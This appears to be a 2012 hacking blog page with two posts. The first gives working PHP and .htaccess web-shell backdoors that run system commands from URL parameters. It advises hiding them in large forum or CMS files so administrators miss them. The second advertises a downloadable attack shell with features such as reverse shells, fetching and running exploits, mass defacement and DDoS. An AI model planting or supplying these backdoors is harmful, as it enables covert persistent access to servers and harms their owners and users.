2012-12-25

Php & htaccess backdoors

Php backdoor

Sometimes it is needed to backdoor php files on the server to have a way to get it back.
Note! Im not talking about encoding a php file to insert a backdoor on it, this is just a form which allows you to execute system commands.
Im gonna show two ways to do this, using .htaccess and php files itself.

The good of the php method is that it can be inserted at any php file, for example a large forum/cms file where the admin wont be able to find it.

A simple php backdoor:
<?php system($_GET['c']); ?> Go to site.com/filename.php?c=whoami (filename= file name you saved it, whoami= system command)
Gr8, but what if we want our backdoor password protected?
<?php if(isset($_GET['pass']) && $_GET['pass'] == 'yourpass'){ system($_GET['c']);} ?> Now go to site.com/filename.php?pass=yourpass&c=whoami

Htaccess backdoor:
By default viewing .htaccess files on browser is disabled by the server, so firsly we allow viewing of php files:

<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
Then we change the type to php executable, meaning that the file will run as php script:
AddType application/x-httpd-php .htaccess And in the end we add the backdoor code:
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?> Full script:
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
This Features are also avaiable in albozz shell, for more you may also want to check weevely, awesome php backdoor.

2012-10-28

Alb0zZ Team Shell ░▒▓█►PRIV8 TILL NOW◄█▓▒░ ~ [Unique Features] [FREE]

By a frend, 0x0
-=-=-=-=-=-=-=-=
Some skids leaked download link so why dont i share myself
Author: 0x0

I would like to give credits to:
DevilzCode (perl symlink script)
Syrian Shell (ddos & zone-h)
x-h4ck (Cloudflare ip finder)
Features
3 login attemps
ready commands
execute command
create file
chmod file
file manager
view file
download
rename
delete
upload (choose dir)
turn off magic_quotes_gpc
encode/decode
(base64/urlencode/md5/sha1/sha512)
bind/backconnect (5)
get exploit and execute
auto symlink (perl)
eval
mass script deface
processes
zone-h
ddos
mysql connect (unique)
tools (mass mail, Cloudflare, Hide Shell, CMS Fack, List Directory, Text 2 Hex, LFI Dude)
phpinfo
logout
kill shell
Screenshots
  Login:
Main window:
File manager:
Htaccess tweaks:
Bind/backconnect:
symlink:
get file(exploit):
tools:
NOTE: There are few encrypted scripts inside the shell, you can decrypt them using encoder tools (not backdoor)
Support download link: http://fileme.us/file/03hrd
Password: yuno
or if you cant download from sharecash
http://adf.ly/DgNoW